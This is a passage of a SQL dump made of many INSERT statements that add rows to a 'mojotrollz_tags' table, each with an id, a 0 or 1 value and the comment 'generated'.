(1426, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1427, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1428, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1429, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1430, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1431, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1432, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1433, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1434, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1435, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1436, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1437, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1438, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1439, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1440, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1442, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1444, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1445, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1446, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1447, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1448, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1449, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1450, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1451, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1452, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1453, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1454, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1456, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1457, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1458, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1459, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1462, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1463, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1464, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1466, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1467, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1468, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1469, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1470, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1471, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1472, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1473, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1474, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1475, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1476, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1477, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1478, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1479, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1481, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1482, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1483, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1484, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1485, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1486, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1487, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1488, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1489, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1490, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1491, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1492, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1499, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1501, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1502, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1503, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1504, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1505, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1506, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1507, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1508, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1509, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1510, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1511, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1512, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1513, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1515, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1516, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1517, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1518, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1519, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1520, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1521, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1522, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1523, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1524, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1525, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1526, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1528, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1529, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1530, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1531, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1532, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1534, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1535, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1536, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1558, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1559, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1560, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1578, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1579, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1580, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1581, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1582, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1598, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1599, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1618, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1638, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1639, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1640, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1641, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1643, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1644, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1645, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1647, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1648, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1650, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1651, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1652, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1653, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1654, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1655, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1656, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1661, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1665, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1666, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1667, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1678, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1679, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1680, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1681, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1682, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1683, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1684, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1685, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1686, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1687, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1688, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1689, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1690, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1691, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1692, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1693, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1698, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1699, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1700, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1701, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1702, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1703, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1704, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1705, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1706, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1707, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1708, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1709, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1710, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1711, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1712, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1713, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1715, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1716, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1717, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1718, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1719, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1738, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1739, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1740, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1758, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1778, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1779, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1780, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1781, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1782, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1783, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1784, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1785, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1786, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1787, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1788, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1789, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1790, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1791, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1792, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1793, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1794, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1795, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1796, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1798, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1799, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1800, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1801, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1802, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1803, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1804, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1805, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1806, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1818, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1819, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1820, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1821, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1822, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1823, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1824, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1825, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1838, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1839, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1840, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1841, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1842, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1843, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1844, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1845, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1846, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1847, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1848, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1858, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1859, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1860, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1861, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1878, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1879, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1880, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1881, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1882, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1883, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1884, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1885, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1886, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1898, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1899, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1919, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1920, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1921, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1938, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1939, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1940, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1941, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1942, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1943, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1944, 